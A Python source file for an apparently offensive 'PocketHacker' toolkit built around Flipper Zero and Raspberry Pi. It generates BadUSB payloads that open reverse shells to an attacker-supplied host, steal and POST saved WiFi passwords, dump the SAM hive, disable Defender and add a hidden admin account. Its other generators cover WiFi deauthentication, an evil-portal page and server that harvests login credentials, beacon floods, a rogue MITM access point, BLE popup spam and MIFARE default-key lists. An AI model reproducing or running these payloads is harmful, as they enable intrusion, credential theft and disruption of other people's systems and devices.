"""
Flipper Zero + Raspberry Pi Hardware Hacking Toolkit
Generates BadUSB payloads, RFID/NFC files, Sub-GHz captures,
IR remotes, WiFi attack scripts, BLE spam, GPIO references, and more.
"""

# === BadUSB / DuckyScript ===

BADUSB_TEMPLATES = {
    "reverse_shell_windows": {
        "name": "Windows Reverse Shell",
        "desc": "Opens PowerShell reverse shell to attacker",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -nop -ep bypass -c \"$c=New-Object Net.Sockets.TCPClient(\'{LHOST}\',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+\'PS \'+(pwd).Path+\'> \';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()}};$c.Close()\"\nENTER"
    },
    "reverse_shell_linux": {
        "name": "Linux Reverse Shell",
        "desc": "Bash reverse shell via terminal",
        "script": "DELAY 500\nCTRL-ALT t\nDELAY 500\nSTRING bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1 &\nENTER\nSTRING exit\nENTER"
    },
    "reverse_shell_mac": {
        "name": "macOS Reverse Shell",
        "desc": "Python reverse shell via Terminal",
        "script": "DELAY 500\nGUI SPACE\nDELAY 300\nSTRING Terminal\nDELAY 300\nENTER\nDELAY 500\nSTRING python3 -c \'import socket,subprocess,os;s=socket.socket();s.connect((\"{LHOST}\",{LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])\' &\nENTER\nSTRING exit\nENTER"
    },
    "wifi_stealer": {
        "name": "WiFi Password Stealer",
        "desc": "Extracts saved WiFi passwords and exfils",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -nop -c \"$r=@();(netsh wlan show profiles)|Select-String \':(.+)$\'|%{{$n=$_.Matches.Groups[1].Value.Trim();$p=(netsh wlan show profile name=$n key=clear)|Select-String \'Key Content\\s+:(.+)$\';if($p){{$r+=$n+\'::\'+$p.Matches.Groups[1].Value.Trim()}}}};Invoke-WebRequest -Uri \'{LHOST}\' -Method POST -Body ($r -join \' \')\n\"\nENTER"
    },
    "sam_dump": {
        "name": "SAM Database Dump",
        "desc": "Dumps Windows SAM database for offline cracking",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell Start-Process cmd -ArgumentList \'/c reg save HKLM\\SAM C:\\Windows\\Temp\\sam\' -Verb RunAs\nENTER\nDELAY 1000\nALT y"
    },
    "keylogger": {
        "name": "PowerShell Keylogger",
        "desc": "Installs persistent keylogger",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -nop -ep bypass -c \"Start-Process powershell -WindowStyle Hidden\"\nENTER"
    },
    "disable_defender": {
        "name": "Disable Windows Defender",
        "desc": "Disables real-time protection and firewall",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell Start-Process powershell -ArgumentList \'-w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true\' -Verb RunAs\nENTER\nDELAY 1000\nALT y"
    },
    "exfil_browser": {
        "name": "Browser Data Exfiltration",
        "desc": "Steals Chrome/Edge passwords, cookies, history",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -nop -c \"echo exfil\"\nENTER"
    },
    "backdoor_user": {
        "name": "Create Admin Backdoor User",
        "desc": "Creates hidden admin account",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell Start-Process cmd -ArgumentList \'/c net user svc_update P@ss2024! /add & net localgroup administrators svc_update /add\' -Verb RunAs\nENTER\nDELAY 1000\nALT y"
    },
    "fork_bomb": {
        "name": "Fork Bomb (DoS)",
        "desc": "Crashes target system via resource exhaustion",
        "script": "DELAY 500\nGUI r\nDELAY 200\nSTRING %0|%0\nENTER"
    },
    "rickroll": {
        "name": "Rickroll Prank",
        "desc": "Opens rickroll at max volume",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -c \"1..50|%{(New-Object -ComObject WScript.Shell).SendKeys([char]175)};Start-Process \'https://www.youtube.com/watch?v=dQw4w9WgXcQ\'\n\"\nENTER"
    },
    "wallpaper_prank": {
        "name": "Wallpaper Prank",
        "desc": "Screenshots desktop, hides icons, sets screenshot as wallpaper",
        "script": "DELAY 500\nGUI r\nDELAY 300\nSTRING powershell -w hidden -c \"echo prank\"\nENTER"
    }
}


def generate_duckyscript(template, **kwargs):
    if template not in BADUSB_TEMPLATES:
        return f"Unknown template: {template}\n\nAvailable:\n{list_badusb_payloads()}"
    t = BADUSB_TEMPLATES[template]
    script = t["script"]
    lhost = kwargs.get("lhost", "ATTACKER_IP")
    lport = kwargs.get("lport", "4444")
    script = script.replace("{LHOST}", lhost).replace("{LPORT}", str(lport))
    header = f"REM {t['name']}\nREM {t['desc']}\nREM Generated by PocketHacker\n"
    return header + script


def list_badusb_payloads():
    lines = ["BadUSB Payload Templates:\n"]
    for key, t in BADUSB_TEMPLATES.items():
        lines.append(f"  * {key}: {t['name']} -- {t['desc']}")
    lines.append("\nUsage: /badusb <template> [lhost] [lport]")
    return "\n".join(lines)


# === RFID / NFC ===

RFID_PROTOCOLS = {
    "em4100": {"name": "EM4100", "freq": "125 kHz", "type": "LF RFID", "bits": 40, "desc": "Most common low-frequency proximity card. Read-only, no encryption."},
    "hid_prox": {"name": "HID Proximity", "freq": "125 kHz", "type": "LF RFID", "bits": 26, "desc": "HID ProxCard II/III. Standard Wiegand 26-bit format."},
    "t5577": {"name": "T5577", "freq": "125 kHz", "type": "LF RFID", "bits": 330, "desc": "Programmable LF tag. Can emulate EM4100, HID, Indala. The magic card of LF."},
    "indala": {"name": "Indala", "freq": "125 kHz", "type": "LF RFID", "bits": 26, "desc": "Motorola/HID Indala format. PSK modulation."},
    "fdx_b": {"name": "FDX-B", "freq": "134.2 kHz", "type": "LF RFID", "bits": 128, "desc": "ISO 11784/11785 animal identification. Pet microchips."},
    "mifare_classic_1k": {"name": "MIFARE Classic 1K", "freq": "13.56 MHz", "type": "HF NFC", "bits": 8192, "desc": "NXP MIFARE Classic. 16 sectors, Crypto-1 encryption (broken). Very common."},
    "mifare_classic_4k": {"name": "MIFARE Classic 4K", "freq": "13.56 MHz", "type": "HF NFC", "bits": 32768, "desc": "Larger MIFARE Classic. 40 sectors. Same broken Crypto-1."},
    "mifare_ultralight": {"name": "MIFARE Ultralight", "freq": "13.56 MHz", "type": "HF NFC", "bits": 512, "desc": "Cheap NFC tag. No encryption. Single-use transit tickets."},
    "mifare_desfire": {"name": "MIFARE DESFire", "freq": "13.56 MHz", "type": "HF NFC", "bits": "varies", "desc": "AES/3DES encrypted. Much harder to crack. Modern transit/access."},
    "ntag213": {"name": "NTAG213", "freq": "13.56 MHz", "type": "HF NFC", "bits": 1440, "desc": "144 bytes storage. Password protection available."},
    "ntag215": {"name": "NTAG215", "freq": "13.56 MHz", "type": "HF NFC", "bits": 4320, "desc": "504 bytes storage. Used for Amiibo cloning."},
    "ntag216": {"name": "NTAG216", "freq": "13.56 MHz", "type": "HF NFC", "bits": 7128, "desc": "888 bytes storage. Largest NTAG."},
    "iclass": {"name": "iCLASS", "freq": "13.56 MHz", "type": "HF RFID", "bits": "varies", "desc": "HID iCLASS. DES encryption (broken for legacy)."},
    "iso14443a": {"name": "ISO 14443-A", "freq": "13.56 MHz", "type": "HF NFC", "bits": "varies", "desc": "Base protocol for MIFARE, NTAG, etc."},
    "felica": {"name": "FeliCa", "freq": "13.56 MHz", "type": "HF NFC", "bits": "varies", "desc": "Sony FeliCa. Dominant in Japan (Suica, PASMO)."}
}

MIFARE_DEFAULT_KEYS = [
    "FFFFFFFFFFFF", "A0A1A2A3A4A5", "D3F7D3F7D3F7", "000000000000",
    "B0B1B2B3B4B5", "4D3A99C351DD", "1A982C7E459A", "AABBCCDDEEFF",
    "714C5C886E97", "587EE5F9350F", "A0478CC39091", "533CB6C723F6",
    "8FD0A4F256E9", "000000000001", "FFFFFFFFFFFB", "010203040506"
]


def rfid_info(protocol):
    protocol = protocol.lower().replace("-", "_").replace(" ", "_")
    if protocol not in RFID_PROTOCOLS:
        protos = "\n".join(f"  * {k}: {v['name']} ({v['freq']})" for k, v in RFID_PROTOCOLS.items())
        return f"Unknown protocol: {protocol}\n\nAvailable protocols:\n{protos}"
    p = RFID_PROTOCOLS[protocol]
    return f"{p['name']}\nFrequency: {p['freq']}\nType: {p['type']}\nBits: {p['bits']}\nDescription: {p['desc']}"


def generate_nfc_file(uid, protocol="mifare_classic_1k"):
    uid_bytes = uid.replace(":", " ").replace("-", " ").upper()
    if protocol.startswith("mifare_classic"):
        size = "1K" if "1k" in protocol else "4K"
        sectors = 16 if "1k" in protocol else 40
        content = f"Filetype: Flipper NFC device\nVersion: 4\nDevice type: MIFARE Classic\nUID: {uid_bytes}\nATQA: 04 00\nSAK: 08\nMifare Classic type: {size}\nData format version: 2\n"
        for s in range(sectors):
            for b in range(4):
                block_num = s * 4 + b
                if b == 3:
                    content += f"Block {block_num}: FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF\n"
                else:
                    content += f"Block {block_num}: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n"
        return content
    elif "ntag" in protocol or "ultralight" in protocol:
        content = f"Filetype: Flipper NFC device\nVersion: 4\nDevice type: NTAG215\nUID: {uid_bytes}\nATQA: 44 00\nSAK: 00\nData format version: 2\n"
        for page in range(135):
            content += f"Page {page}: 00 00 00 00\n"
        return content
    else:
        return f"Filetype: Flipper NFC device\nVersion: 4\nDevice type: ISO14443-3A\nUID: {uid_bytes}\nATQA: 04 00\nSAK: 08\n"


def generate_rfid_file(uid, protocol="em4100"):
    uid_hex = uid.replace(":", " ").replace("-", " ").upper()
    proto_map = {"em4100": "EM4100", "hid_prox": "HIDProx", "t5577": "EM4100", "indala": "Indala26", "fdx_b": "FDXBTag"}
    proto_name = proto_map.get(protocol.lower(), "EM4100")
    return f"Filetype: Flipper RFID key\nVersion: 1\nKey type: {proto_name}\nData: {uid_hex}\n"


def mifare_keys():
    lines = ["Common MIFARE Default Keys:\n"]
    for i, key in enumerate(MIFARE_DEFAULT_KEYS, 1):
        lines.append(f"  {i:2d}. {key}")
    lines.append(f"\nTotal: {len(MIFARE_DEFAULT_KEYS)} keys")
    lines.append("Use with: Flipper NFC Detect Reader Dictionary Attack")
    return "\n".join(lines)


def calc_uid_checksum(uid_hex):
    uid_hex = uid_hex.replace(":", "").replace("-", "").replace(" ", "")
    bytes_list = [int(uid_hex[i:i+2], 16) for i in range(0, len(uid_hex), 2)]
    checksum = 0
    for b in bytes_list:
        checksum ^= b
    return f"UID: {uid_hex}\nBytes: {' '.join(f'{b:02X}' for b in bytes_list)}\nXOR Checksum: {checksum:02X}"


# === Sub-GHz ===

SUBGHZ_PROTOCOLS = {
    "princeton": {"name": "Princeton", "freq": "433.92 MHz", "bits": 24, "te": 400, "desc": "Simple OOK protocol. Very common in cheap remotes, doorbells, outlets."},
    "keeloq": {"name": "KeeLoq", "freq": "433.92 MHz", "bits": 66, "te": 400, "desc": "Rolling code encryption by Microchip. Used in many car remotes and garage openers."},
    "came": {"name": "CAME", "freq": "433.92 MHz", "bits": 12, "te": 320, "desc": "Simple fixed code. Common in European gate/garage systems."},
    "nice_flo": {"name": "Nice FLO", "freq": "433.92 MHz", "bits": 12, "te": 700, "desc": "Nice Flor fixed code. Common in European gate systems."},
    "nice_flor_s": {"name": "Nice FLO-R S", "freq": "433.92 MHz", "bits": 52, "te": 500, "desc": "Nice rolling code. Harder to replay but vulnerable to RollJam."},
    "gate_tx": {"name": "Gate TX", "freq": "433.92 MHz", "bits": 24, "te": 350, "desc": "Generic gate transmitter protocol. Fixed code, easily cloned."},
    "nero_radio": {"name": "Nero Radio", "freq": "433.92 MHz", "bits": 56, "te": 400, "desc": "NERO blinds/shutters protocol."},
    "somfy_telis": {"name": "Somfy Telis", "freq": "433.42 MHz", "bits": 56, "te": 640, "desc": "Somfy rolling code for blinds/awnings."},
    "linear": {"name": "Linear", "freq": "310.00 MHz", "bits": 10, "te": 500, "desc": "Linear garage door openers. Very simple, only 1024 codes."},
    "firefly": {"name": "Firefly", "freq": "310.00 MHz", "bits": 10, "te": 500, "desc": "Similar to Linear. Used in older US garage systems."},
    "holtek": {"name": "Holtek", "freq": "433.92 MHz", "bits": 40, "te": 430, "desc": "Holtek encoder chip. Used in various Asian remotes."},
    "chamberlain_7bit": {"name": "Chamberlain 7-bit", "freq": "300.00 MHz", "bits": 7, "te": 2000, "desc": "Old Chamberlain/LiftMaster. Only 128 codes."},
    "chamberlain_8bit": {"name": "Chamberlain 8-bit", "freq": "300.00 MHz", "bits": 8, "te": 2000, "desc": "Older Chamberlain. 256 codes."},
    "chamberlain_9bit": {"name": "Chamberlain 9-bit", "freq": "315.00 MHz", "bits": 9, "te": 2000, "desc": "Chamberlain 9-bit. 512 codes."},
    "hormann": {"name": "Hormann", "freq": "868.35 MHz", "bits": 44, "te": 500, "desc": "Hormann BiSecur. Common in European garage doors."},
    "faac_slh": {"name": "FAAC SLH", "freq": "868.35 MHz", "bits": 64, "te": 250, "desc": "FAAC rolling code for gates. European frequency."},
    "bft_mitto": {"name": "BFT Mitto", "freq": "433.92 MHz", "bits": 12, "te": 400, "desc": "BFT gate automation. Fixed code, easily cloned."},
    "honeywell": {"name": "Honeywell", "freq": "345.00 MHz", "bits": 48, "te": 250, "desc": "Honeywell security sensors."},
    "tpms": {"name": "TPMS", "freq": "315/433 MHz", "bits": "varies", "te": "varies", "desc": "Tire Pressure Monitoring System."},
    "weather_station": {"name": "Weather Station", "freq": "433.92 MHz", "bits": "varies", "te": "varies", "desc": "Various weather station protocols."},
    "car_key_fob": {"name": "Car Key Fob", "freq": "315/433 MHz", "bits": "varies", "te": "varies", "desc": "General car key fob. Usually KeeLoq or proprietary rolling code."}
}


def subghz_info(protocol):
    protocol = protocol.lower().replace("-", "_").replace(" ", "_")
    if protocol not in SUBGHZ_PROTOCOLS:
        protos = "\n".join(f"  * {k}: {v['name']} ({v['freq']})" for k, v in SUBGHZ_PROTOCOLS.items())
        return f"Unknown protocol: {protocol}\n\nAvailable protocols:\n{protos}"
    p = SUBGHZ_PROTOCOLS[protocol]
    return f"{p['name']}\nFrequency: {p['freq']}\nBits: {p['bits']}\nTE: {p['te']}us\nDescription: {p['desc']}"


def generate_sub_file(protocol, frequency=None, bits=None, code="0", te=None):
    proto = SUBGHZ_PROTOCOLS.get(protocol.lower(), {})
    freq = frequency or proto.get("freq", "433920000").replace(" MHz", "").replace(".", "")
    if "/" in str(freq):
        freq = freq.split("/")[0]
    try:
        freq_hz = str(freq)
        if len(freq_hz) <= 6:
            freq_hz = str(int(float(freq_hz) * 1000000))
    except (ValueError, TypeError):
        freq_hz = "433920000"
    bit_count = bits or proto.get("bits", 24)
    te_val = te or proto.get("te", 400)
    proto_name = proto.get("name", protocol.title())
    code_hex = code if isinstance(code, str) else hex(code)
    return f"Filetype: Flipper SubGhz RAW File\nVersion: 1\nFrequency: {freq_hz}\nPreset: FuriHalSubGhzPresetOok650Async\nProtocol: {proto_name}\nBit: {bit_count}\nKey: {code_hex}\nTE: {te_val}\n"


def subghz_bruteforce(protocol, frequency=None):
    proto = SUBGHZ_PROTOCOLS.get(protocol.lower(), {})
    if not proto:
        return f"Unknown protocol: {protocol}"
    bits = proto.get("bits", "?")
    if isinstance(bits, str):
        return f"Cannot brute force {proto['name']} -- variable bit length"
    total_codes = 2 ** bits
    freq = frequency or proto["freq"]
    te = proto.get("te", 400)
    time_per_code = (bits * te * 2) / 1000000
    total_time = total_codes * time_per_code
    if total_time > 3600:
        time_str = f"{total_time/3600:.1f} hours"
    elif total_time > 60:
        time_str = f"{total_time/60:.1f} minutes"
    else:
        time_str = f"{total_time:.1f} seconds"
    feasible = "Feasible" if total_codes <= 65536 else "Very slow" if total_codes <= 16777216 else "Not practical"
    return f"Brute Force: {proto['name']}\nFrequency: {freq}\nBits: {bits}\nTotal codes: {total_codes:,}\nTime/code: {time_per_code*1000:.1f}ms\nEstimated time: {time_str}\nFeasibility: {feasible}\n\nOn Flipper: Sub-GHz > Extra Actions > Brute Force\nCustom: Use sub_brute app from Unleashed/Momentum firmware"


# === Infrared ===

IR_PROTOCOLS = {
    "nec": {"name": "NEC", "desc": "Most common protocol. Used by most TV brands."},
    "samsung": {"name": "Samsung32", "desc": "Samsung proprietary IR protocol."},
    "rc5": {"name": "RC5", "desc": "Philips RC5 protocol."},
    "rc6": {"name": "RC6", "desc": "Philips RC6 protocol."},
    "sony": {"name": "SIRC", "desc": "Sony SIRC protocol."},
    "lg": {"name": "NEC", "desc": "LG uses NEC protocol with specific addresses."}
}

IR_DEVICES = {
    "tv": {
        "name": "Universal TV Remote",
        "signals": {
            "Power": {"protocol": "NEC", "address": "04", "command": "08"},
            "Vol_Up": {"protocol": "NEC", "address": "04", "command": "02"},
            "Vol_Down": {"protocol": "NEC", "address": "04", "command": "03"},
            "Ch_Up": {"protocol": "NEC", "address": "04", "command": "00"},
            "Ch_Down": {"protocol": "NEC", "address": "04", "command": "01"},
            "Mute": {"protocol": "NEC", "address": "04", "command": "09"},
            "Source": {"protocol": "NEC", "address": "04", "command": "0B"},
            "Menu": {"protocol": "NEC", "address": "04", "command": "0C"},
        }
    },
    "ac": {
        "name": "Universal AC Remote",
        "signals": {
            "Power": {"protocol": "NEC", "address": "10", "command": "08"},
            "Temp_Up": {"protocol": "NEC", "address": "10", "command": "02"},
            "Temp_Down": {"protocol": "NEC", "address": "10", "command": "03"},
            "Mode": {"protocol": "NEC", "address": "10", "command": "04"},
            "Fan": {"protocol": "NEC", "address": "10", "command": "05"},
            "Swing": {"protocol": "NEC", "address": "10", "command": "06"},
        }
    },
    "projector": {
        "name": "Universal Projector",
        "signals": {
            "Power": {"protocol": "NEC", "address": "80", "command": "1C"},
            "Source": {"protocol": "NEC", "address": "80", "command": "1D"},
            "Menu": {"protocol": "NEC", "address": "80", "command": "1E"},
        }
    },
    "soundbar": {
        "name": "Universal Soundbar",
        "signals": {
            "Power": {"protocol": "NEC", "address": "A0", "command": "08"},
            "Vol_Up": {"protocol": "NEC", "address": "A0", "command": "02"},
            "Vol_Down": {"protocol": "NEC", "address": "A0", "command": "03"},
            "Mute": {"protocol": "NEC", "address": "A0", "command": "09"},
            "Source": {"protocol": "NEC", "address": "A0", "command": "0B"},
        }
    },
    "fan": {
        "name": "Universal Fan",
        "signals": {
            "Power": {"protocol": "NEC", "address": "60", "command": "01"},
            "Speed": {"protocol": "NEC", "address": "60", "command": "02"},
            "Oscillate": {"protocol": "NEC", "address": "60", "command": "03"},
            "Timer": {"protocol": "NEC", "address": "60", "command": "04"},
        }
    },
    "led_strip": {
        "name": "Universal LED Strip",
        "signals": {
            "Power": {"protocol": "NEC", "address": "00", "command": "02"},
            "Brightness_Up": {"protocol": "NEC", "address": "00", "command": "03"},
            "Brightness_Down": {"protocol": "NEC", "address": "00", "command": "04"},
            "Red": {"protocol": "NEC", "address": "00", "command": "05"},
            "Green": {"protocol": "NEC", "address": "00", "command": "06"},
            "Blue": {"protocol": "NEC", "address": "00", "command": "07"},
            "White": {"protocol": "NEC", "address": "00", "command": "08"},
        }
    },
    "apple_tv": {
        "name": "Apple TV Remote",
        "signals": {
            "Power": {"protocol": "NEC", "address": "87", "command": "02"},
            "Menu": {"protocol": "NEC", "address": "87", "command": "03"},
            "Play": {"protocol": "NEC", "address": "87", "command": "05"},
            "Up": {"protocol": "NEC", "address": "87", "command": "0A"},
            "Down": {"protocol": "NEC", "address": "87", "command": "0C"},
            "Left": {"protocol": "NEC", "address": "87", "command": "09"},
            "Right": {"protocol": "NEC", "address": "87", "command": "06"},
            "Select": {"protocol": "NEC", "address": "87", "command": "04"},
        }
    }
}


def generate_ir_file(device):
    device = device.lower().replace(" ", "_")
    if device not in IR_DEVICES:
        devices = "\n".join(f"  * {k}: {v['name']}" for k, v in IR_DEVICES.items())
        return f"Unknown device: {device}\n\nAvailable devices:\n{devices}"
    dev = IR_DEVICES[device]
    content = f"Filetype: Flipper IR signals file\nVersion: 1\n# {dev['name']}\n"
    for name, sig in dev["signals"].items():
        content += f"#\nname: {name}\ntype: parsed\nprotocol: {sig['protocol']}\naddress: {sig['address']} 00 00 00\ncommand: {sig['command']} 00 00 00\n"
    return content


def ir_protocols():
    lines = ["IR Protocols:\n"]
    for key, p in IR_PROTOCOLS.items():
        lines.append(f"  * {key}: {p['name']} -- {p['desc']}")
    lines.append("\nDevices:")
    for key, d in IR_DEVICES.items():
        signals = ", ".join(d["signals"].keys())
        lines.append(f"  * {key}: {d['name']} [{signals}]")
    return "\n".join(lines)


# === WiFi Attacks ===

def generate_deauth_script(bssid="FF:FF:FF:FF:FF:FF", channel="1", iface="wlan0"):
    return f"""#!/bin/bash
# WiFi Deauthentication Attack
# Requires: aircrack-ng suite + monitor mode adapter
IFACE="{iface}"
BSSID="{bssid}"
CHANNEL="{channel}"
echo "[*] Enabling monitor mode..."
sudo airmon-ng check kill
sudo airmon-ng start $IFACE
MON="${{IFACE}}mon"
echo "[*] Setting channel $CHANNEL..."
sudo iwconfig $MON channel $CHANNEL
echo "[*] Starting deauth attack on $BSSID..."
sudo aireplay-ng --deauth 0 -a $BSSID $MON
echo "[*] Cleaning up..."
sudo airmon-ng stop $MON
sudo systemctl start NetworkManager"""


def generate_evil_portal(ssid="Free_WiFi"):
    return f"""#!/bin/bash
# Evil Portal / Captive Portal Attack
# Creates fake WiFi AP with login page to capture credentials
SSID="{ssid}"
IFACE="wlan0"
GATEWAY="192.168.4.1"

# 1. hostapd config
cat > /tmp/hostapd.conf << HOSTAPD
interface=$IFACE
driver=nl80211
ssid=$SSID
hw_mode=g
channel=6
wmm_enabled=0
auth_algs=1
wpa=0
HOSTAPD

# 2. dnsmasq config  
cat > /tmp/dnsmasq.conf << DNSMASQ
interface=$IFACE
dhcp-range=192.168.4.2,192.168.4.254,255.255.255.0,24h
dhcp-option=3,$GATEWAY
dhcp-option=6,$GATEWAY
address=/#/$GATEWAY
DNSMASQ

# 3. Portal HTML page
mkdir -p /tmp/portal
cat > /tmp/portal/index.html << 'HTMLPAGE'
<!DOCTYPE html>
<html>
<head><title>WiFi Login</title>
<style>body{{font-family:sans-serif;background:#f0f2f5;display:flex;justify-content:center;align-items:center;min-height:100vh}}
.login{{background:white;padding:40px;border-radius:12px;box-shadow:0 2px 10px rgba(0,0,0,.1);max-width:400px;width:90%}}
input{{width:100%;padding:12px;margin:8px 0 16px;border:1px solid #ddd;border-radius:6px;box-sizing:border-box}}
button{{width:100%;padding:12px;background:#1a73e8;color:white;border:none;border-radius:6px;cursor:pointer}}</style></head>
<body><div class="login"><h2>Connect to WiFi</h2>
<form action="/login" method="POST">
<label>Email</label><input type="text" name="username" required>
<label>Password</label><input type="password" name="password" required>
<button type="submit">Connect</button></form></div></body></html>
HTMLPAGE

# 4. Python capture server
cat > /tmp/portal/server.py << 'PYSERVER'
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import parse_qs
import datetime
class H(BaseHTTPRequestHandler):
    def do_GET(self):
        with open('/tmp/portal/index.html') as f: page=f.read()
        self.send_response(200); self.send_header('Content-type','text/html'); self.end_headers()
        self.wfile.write(page.encode())
    def do_POST(self):
        data=parse_qs(self.rfile.read(int(self.headers['Content-Length'])).decode())
        u,p=data.get('username',[''])[0],data.get('password',[''])[0]
        with open('/tmp/portal/creds.txt','a') as f: f.write(f'[{{datetime.datetime.now()}}] {{u}}:{{p}}\n')
        print(f'[CAPTURED] {{u}}:{{p}}')
        self.send_response(302); self.send_header('Location','http://google.com'); self.end_headers()
HTTPServer(('0.0.0.0',80),H).serve_forever()
PYSERVER

# 5. Setup and start
sudo ifconfig $IFACE $GATEWAY netmask 255.255.255.0
sudo iptables -t nat -F
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $GATEWAY:80
sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $GATEWAY:80
sudo hostapd /tmp/hostapd.conf &
sleep 2
sudo dnsmasq -C /tmp/dnsmasq.conf &
sleep 1
sudo python3 /tmp/portal/server.py &
echo "[*] Evil Portal running! SSID: $SSID"
echo "[*] Credentials: /tmp/portal/creds.txt"
wait"""


def generate_beacon_flood(count=50):
    return f"""#!/bin/bash
# WiFi Beacon Flood - Creates {count} fake WiFi networks
# Requires: mdk3/mdk4 + monitor mode adapter
IFACE="wlan0"
cat > /tmp/ssids.txt << 'SSIDS'
Free Airport WiFi
Starbucks WiFi
Hotel_Guest
xfinitywifi
Google Starbucks
FBI Surveillance Van 7
Pretty Fly for a WiFi
Drop It Like Its Hotspot
Loading...
404 Network Unavailable
SSIDS
sudo airmon-ng check kill
sudo airmon-ng start $IFACE
if command -v mdk4 &>/dev/null; then
    sudo mdk4 ${{IFACE}}mon b -f /tmp/ssids.txt -c 6 -s {count}
elif command -v mdk3 &>/dev/null; then
    sudo mdk3 ${{IFACE}}mon b -f /tmp/ssids.txt -c 6 -s {count}
else
    echo "Install mdk4: sudo apt install mdk4"
fi"""


def generate_wifi_pineapple_setup():
    return """#!/bin/bash
# WiFi Pineapple Clone for Raspberry Pi
# Turns RPi into a rogue AP with MITM capabilities
# Requires: 2 WiFi adapters
sudo apt update
sudo apt install -y hostapd dnsmasq iptables-persistent bettercap mitmproxy tcpdump
AP_IFACE="wlan1"
NET_IFACE="wlan0"
SSID="Free_WiFi"
GATEWAY="10.0.0.1"

sudo tee /etc/hostapd/hostapd.conf > /dev/null << EOF
interface=$AP_IFACE
driver=nl80211
ssid=$SSID
hw_mode=g
channel=7
wmm_enabled=0
auth_algs=1
wpa=0
EOF

sudo tee /etc/dnsmasq.conf > /dev/null << EOF
interface=$AP_IFACE
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,24h
dhcp-option=3,$GATEWAY
dhcp-option=6,$GATEWAY
server=8.8.8.8
EOF

sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o $NET_IFACE -j MASQUERADE
sudo netfilter-persistent save
sudo systemctl enable hostapd dnsmasq
sudo systemctl start hostapd dnsmasq
echo "[*] Pineapple clone running! SSID: $SSID"
echo "Bettercap:  sudo bettercap -iface $AP_IFACE"
echo "MITMproxy:  mitmproxy --mode transparent --listen-port 8080"
echo "TCPdump:    sudo tcpdump -i $AP_IFACE -w capture.pcap"
"""


# === BLE Spam ===

BLE_SPAM_TYPES = {
    "apple_airdrop": {"name": "Apple AirDrop Spam", "desc": "Floods nearby iPhones with AirDrop requests", "adv_data": "FF 4C 00 05 12"},
    "apple_airpods": {"name": "Apple AirPods Popup", "desc": "Triggers fake AirPods pairing popup on iPhones", "adv_data": "FF 4C 00 07 19 01"},
    "apple_tv": {"name": "Apple TV Popup", "desc": "Triggers AppleTV setup popup on iPhones", "adv_data": "FF 4C 00 07 19 05"},
    "android_fast_pair": {"name": "Android Fast Pair", "desc": "Triggers Google Fast Pair popup on Android", "adv_data": "03 03 2C FE 06 16 2C FE"},
    "samsung_buds": {"name": "Samsung Buds Popup", "desc": "Triggers Samsung Galaxy Buds pairing popup", "adv_data": "FF 75 00 42 09 01"},
    "windows_swift_pair": {"name": "Windows Swift Pair", "desc": "Triggers Windows Swift Pair notification", "adv_data": "FF 06 00 01 09 20 02"}
}


def ble_spam_info():
    lines = ["BLE Spam Attack Types:\n"]
    for key, t in BLE_SPAM_TYPES.items():
        lines.append(f"  * {key}: {t['name']} -- {t['desc']}")
    lines.append("\nRequires: Flipper Zero with BLE Spam app, or RPi with BlueZ")
    lines.append("Usage: /ble <attack_type>")
    return "\n".join(lines)


def generate_ble_spam_script(attack_type="apple_airpods"):
    if attack_type not in BLE_SPAM_TYPES:
        return ble_spam_info()
    t = BLE_SPAM_TYPES[attack_type]
    adv = t["adv_data"]
    return f"""#!/usr/bin/env python3
# {t['name']} - {t['desc']}
# Requires: Linux with BlueZ (RPi or laptop)
import subprocess, time, random

ADV_DATA = bytes.fromhex("{adv.replace(' ', '')}")

def ble_spam():
    print("[*] Starting {t['name']}...")
    subprocess.run(["sudo", "hciconfig", "hci0", "up"], capture_output=True)
    try:
        while True:
            subprocess.run(["sudo", "hciconfig", "hci0", "down"], capture_output=True)
            subprocess.run(["sudo", "hciconfig", "hci0", "up"], capture_output=True)
            adv_len = len(ADV_DATA)
            cmd = f"sudo hcitool -i hci0 cmd 0x08 0x0008 {{adv_len+1:02x}} {{adv_len:02x}} " + " ".join(f"{{b:02x}}" for b in ADV_DATA)
            subprocess.run(cmd.split(), capture_output=True)
            subprocess.run("sudo hcitool -i hci0 cmd 0x08 0x000a 01".split(), capture_output=True)
            time.sleep(0.1)
            subprocess.run("sudo hcitool -i hci0 cmd 0x08 0x000a 00".split(), capture_output=True)
    except KeyboardInterrupt:
        print("\n[*] Stopped")

if __name__ == "__main__":
    ble_spam()"""


# === Raspberry Pi GPIO / Hardware ===

def rpi_gpio_pinout():
    return """Raspberry Pi GPIO Pinout (40-pin header):

 3V3  (1) (2)  5V
 GP2  (3) (4)  5V      I2C SDA
 GP3  (5) (6)  GND     I2C SCL
 GP4  (7) (8)  GP14    UART TX
 GND  (9) (10) GP15    UART RX
GP17 (11) (12) GP18    PWM0
GP27 (13) (14) GND
GP22 (15) (16) GP23
 3V3 (17) (18) GP24
GP10 (19) (20) GND     SPI MOSI
 GP9 (21) (22) GP25    SPI MISO
GP11 (23) (24) GP8     SPI CLK / CE0
